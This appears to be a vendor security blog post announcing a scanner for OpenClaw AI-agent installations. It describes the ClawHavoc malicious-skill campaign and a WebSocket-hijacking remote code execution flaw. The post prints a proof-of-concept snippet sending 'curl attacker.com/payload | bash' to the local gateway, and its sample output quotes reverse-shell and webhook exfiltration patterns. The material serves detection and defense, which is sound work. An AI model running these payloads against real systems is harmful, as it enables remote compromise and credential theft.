341 Malicious Skills and a 1-Click RCE: Scanning OpenClaw Installations for ClawHavoc
TL;DR: The ClawHavoc campaign planted 341 malicious skills on ClawHub. Combined with GHSA-g8p2's 1-click RCE vulnerability, OpenClaw users face credential theft, reverse shells, and persistent backdoors. We built a scanner to detect it.
npx hackmyagent secure-openclawThe OpenClaw Problem
OpenClaw (formerly Clawdbot, Moltbot) emerged as a popular framework for building AI agents with tool access. Its skill marketplace, ClawHub, made it easy to extend agents with community-contributed capabilities.
Too easy, as it turned out.
In late 2025, security researchers discovered two overlapping threats targeting OpenClaw users:
ClawHavoc Campaign
A coordinated supply chain attack planted 341 malicious skills on ClawHub over a 6-month period. These skills appeared legitimate but contained:
- Credential harvesters — Exfiltrating SSH keys, AWS credentials, and crypto wallets to attacker-controlled webhooks
- Reverse shells — Establishing persistent backdoor access via netcat, bash, and Python payloads
- ClickFix social engineering — Prompting users to paste malicious commands into their terminal
- Typosquatting — Impersonating popular skills with near-identical names (@anthroplc instead of @anthropic)
GHSA-g8p2: 1-Click RCE via WebSocket Hijacking
A critical vulnerability in OpenClaw's gateway allowed any website to hijack the local WebSocket connection:
// Malicious website can connect to OpenClaw gateway
const ws = new WebSocket("ws://localhost:3100");
ws.send(JSON.stringify({
action: "execute",
skill: "shell",
command: "curl attacker.com/payload | bash"
}));
// No authentication required. No user confirmation.Impact: Visit a malicious website while OpenClaw is running = full system compromise. No clicks required beyond the initial page load.
Introducing secure-openclaw
We added 34 specialized security checks to HackMyAgent that scan OpenClaw installations for ClawHavoc indicators, GHSA-g8p2 misconfigurations, and other attack patterns.
# Scan your OpenClaw installation
npx hackmyagent secure-openclaw
# Or specify a custom path
npx hackmyagent secure-openclaw ~/.moltbot
# Auto-fix what can be fixed
npx hackmyagent secure-openclaw --fix
# JSON output for CI/CD
npx hackmyagent secure-openclaw --jsonThe scanner auto-detects common installation paths:
~/.openclaw~/.moltbot~/.clawdbot
What It Detects
34 checks across 5 categories, each targeting specific attack patterns observed in the wild:
SKILL Checks (12)
Malicious skill detection
HEARTBEAT Checks (6)
Scheduled task abuse
OpenClaw's HEARTBEAT.md files define periodic tasks. Attackers abuse these for persistence:
GATEWAY Checks (6) ✨ Auto-fixable
GHSA-g8p2 vulnerability detection
These checks detect the configuration flaws that enable WebSocket hijacking. 4 of 6 can be automatically fixed.
CONFIG Checks (6)
Insecure settings
SUPPLY Checks (4)
Supply chain attacks
Auto-Remediation
Don't just detect problems — fix them. The scanner can automatically remediate gateway misconfigurations that enable GHSA-g8p2 attacks:
# Preview what will be fixed (dry run)
npx hackmyagent secure-openclaw --fix --dry-run
# Apply fixes automatically
npx hackmyagent secure-openclaw --fix
# Undo if something breaks
npx hackmyagent rollback ~/.openclawWhat Gets Fixed
- ✓ 0.0.0.0 → 127.0.0.1 — Binds gateway to localhost only
- ✓ Token → ${ENV_VAR} — Replaces plaintext with env reference
- ✓ Approvals enabled — Requires confirmation for commands
- ✓ Sandbox enabled — Isolates code execution
Safety Features
- → Creates timestamped backup before changes
- → Shows exactly what will change before applying
- → One-command rollback if something breaks
- → Only fixes safe, reversible configurations
Note: If you use --fix and tokens are replaced with env vars, set OPENCLAW_AUTH_TOKEN in your environment before restarting OpenClaw.
Example Output
Running against a compromised installation:
$ npx hackmyagent secure-openclaw ~/.moltbot
╔══════════════════════════════════════════════════════════════════╗
║ OpenClaw Security Report ║
╚══════════════════════════════════════════════════════════════════╝
Target: /Users/dev/.moltbot
Risk Level: CRITICAL
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
CRITICAL FINDINGS (3)
[SKILL-005] Reverse shell pattern detected
File: skills/helper-utils/SKILL.md
Line: 42
Pattern: bash -i >& /dev/tcp/
Remediation: Remove this skill immediately
[SKILL-004] Data exfiltration via webhook
File: skills/sync-helper/SKILL.md
Line: 28
Pattern: curl -X POST https://webhook.site/...
Remediation: Verify destination; remove if unauthorized
[GATEWAY-001] Gateway bound to 0.0.0.0
File: openclaw.json
Config: "host": "0.0.0.0"
Remediation: Bind to 127.0.0.1 for local-only access
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
HIGH FINDINGS (5)
...
Summary: 3 critical, 5 high, 12 medium, 4 low
Exit code: 1 (failures detected)What To Do If You Find Issues
Critical/High Findings
- Disconnect from network — Prevent ongoing exfiltration
- Remove malicious skills — Delete the entire skill directory
- Rotate credentials — Any API keys, SSH keys, or tokens the agent could access
- Check for persistence — Review crontabs, launch agents, startup items
- Audit recent activity — Check shell history, network logs, git commits
Prevention
- ✓ Only install signed skills from verified publishers
- ✓ Keep gateway bound to 127.0.0.1
- ✓ Enable sandbox mode and approval confirmations
- ✓ Review skill code before installation
- ✓ Run
secure-openclawregularly - ✓ Consider migrating to AIM-secured agents
CI/CD Integration
Add to your pipeline to catch compromised skills before deployment:
# GitHub Actions
- name: Security Scan
run: npx hackmyagent secure-openclaw --json > report.json
- name: Fail on Critical
run: |
if jq -e '.findings[] | select(.severity == "critical")' report.json; then
echo "Critical vulnerabilities found"
exit 1
fiThe Bigger Picture
ClawHavoc and GHSA-g8p2 are symptoms of a deeper problem: AI agents are granted extensive system access without adequate identity verification, capability restrictions, or behavioral monitoring.
Scanning for known-bad patterns is necessary but insufficient. To properly secure AI agents, you need:
- Cryptographic identity — Agents prove who they are, not just claim it
- Capability-based access control — Agents can only do what they're explicitly authorized to do
- Continuous trust evaluation — Behavioral anomalies trigger alerts and restrictions
- Complete audit trails — Every action logged and attributable
That's what we're building with AIM (Agent Identity Management).
Scan Your OpenClaw Installation
34 security checks. One command. Free and open source.